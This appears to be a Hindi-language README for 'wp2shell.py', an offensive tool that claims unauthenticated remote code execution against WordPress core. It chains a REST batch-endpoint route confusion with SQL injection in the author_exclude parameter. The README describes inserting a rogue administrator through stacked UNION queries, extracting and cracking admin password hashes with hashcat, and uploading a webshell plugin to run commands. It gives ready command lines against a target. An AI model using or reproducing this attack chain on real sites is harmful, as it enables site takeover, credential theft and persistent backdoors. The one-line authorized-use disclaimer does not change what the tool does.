
अप्रमाणित RCE WordPress कोर में (CVE-2026-63030 + CVE-2026-60137)
वर्डप्रेस REST API के रूट भ्रम (CVE-2026-63030) + SQL इंजेक्शन (CVE-2026-60137) का शोषण करके बैच एंडपॉइंट के माध्यम से रिमोट कोड निष्पादन प्राप्त करें।
वर्डप्रेस REST API बैच एंडपॉइंट (/batch/v1) अनुरोध रूटिंग को उचित रूप से अलग नहीं करता है। बैच अनुरोधों को एक-दूसरे के अंदर नेस्ट करके, एक हमलावर आंतरिक अनुरोध कर सकता है जो वर्डप्रेस के सामान्य अनुमति जांच को बायपास करता है। प्रमुख संकेतक प्रतिक्रिया में parse_path_failed + block_cannot_read त्रुटि पैटर्न है — यह पुष्टि करता है कि रूट भ्रम शोषण योग्य है।
जब कोई अनुरोध बैच एंडपॉइंट के माध्यम से गलत रूट किया जाता है, तो GET /wp/v2/posts में author_exclude पैरामीटर उचित रूप से सैनिटाइज़ नहीं किया जाता है। यह स्टैक्ड क्वेरी और UNION स्टेटमेंट के माध्यम से SQL इंजेक्शन की अनुमति देता है — बिना किसी प्रमाणीकरण के।
चरण 1: जांच
─────────────
बैच एंडपॉइंट की पहुंच की जाँच करें (HTTP 207)
मार्कर अनुरोधों के माध्यम से रूट भ्रम सत्यापित करें
समय/ओरेकल के माध्यम से SQL इंजेक्शन की पुष्टि करें
चरण 2: UNION → RCE (तेज़ पथ)
─────────────────────────────
यदि UNION इंजेक्शन काम करता है:
1. तालिका उपसर्ग का पता लगाएं (ब्लाइंड या ब्रूट-फोर्स सामान्य उपसर्ग)
2. स्टैक्ड UNION INSERT क्वेरी के माध्यम से एडमिन उपयोगकर्ता बनाएं
- Bcrypt हैश हमलावर मशीन पर PHP के माध्यम से उत्पन्न होता है
- {prefix}_users + {prefix}_usermeta में पंक्ति डालें
- नए उपयोगकर्ता को व्यवस्थापक क्षमताएं मिलती हैं
3. लॉगिन + वेबशेल को वर्डप्रेस प्लगइन के रूप में तैनात करें
4. ?t=TOKEN&c=id के माध्यम से आदेश निष्पादित करें
चरण 3: ब्लाइंड → हैश (फ़ॉलबैक पथ)
─────────────────────────────────
यदि UNION अवरुद्ध है लेकिन ब्लाइंड SQLi काम करता है:
1. MySQL संस्करण, उपयोगकर्ता, डेटाबेस नाम निकालें
2. information_schema से तालिका उपसर्ग निकालें
3. {prefix}_users से एडमिन हैश निकालें जहाँ id=1
4. ऑफ़लाइन क्रैक करें: hashcat -m 3200 hash.txt wordlist.txt
5. क्रैक किए गए पासवर्ड के साथ --user / --pass --cmd id का उपयोग करें
चरण 4: क्रेडेंशियल लॉगिन
──────────────────────
यदि --user/--pass प्रदान किया गया है:
1. wp-login.php या REST API बेसिक ऑथ के माध्यम से लॉगिन करें
2. प्लगइन के रूप में वेबशेल अपलोड करें
3. आदेश निष्पादित करें
# ऑटो मोड — जांच, UNION, एडमिन बनाएं, वेबशेल तैनात करें
python3 wp2shell.py https://target.com
# ज्ञात क्रेडेंशियल के साथ (जैसे हैश क्रैक करने के बाद)
python3 wp2shell.py https://target.com --user admin --pass P@ssw0rd --cmd id
# केवल UNION (ब्लाइंड फ़ॉलबैक छोड़ें)
python3 wp2shell.py https://target.com --union-only
# केवल ब्लाइंड निष्कर्षण (UNION प्रयास छोड़ें)
python3 wp2shell.py https://target.com --blind-only
# प्रॉक्सी के माध्यम से डीबग
python3 wp2shell.py https://target.com --proxy http://127.0.0.1:8080
# समय-आधारित ब्लाइंड के लिए कस्टम SLEEP अवधि (डिफ़ॉल्ट 0.01s)
python3 wp2shell.py https://target.com --sleep 0.5
यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। इसका उपयोग करने से पहले आपको लक्ष्य स्वामी से स्पष्ट अनुमति लेनी होगी। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध है।
| फ़्लैग | विवरण |
|---|
--proxy | HTTP प्रॉक्सी (जैसे, Burp Suite) |
--user | लॉगिन के लिए एडमिन उपयोगकर्ता नाम |
--pass | एडमिन पासवर्ड |
--cmd | लक्ष्य पर निष्पादित करने का आदेश |
--union-only | अंधा निष्कर्षण छोड़ें |
--blind-only | UNION प्रयास छोड़ें |
--sleep | समय-आधारित अंधा के लिए SLEEP सेकंड |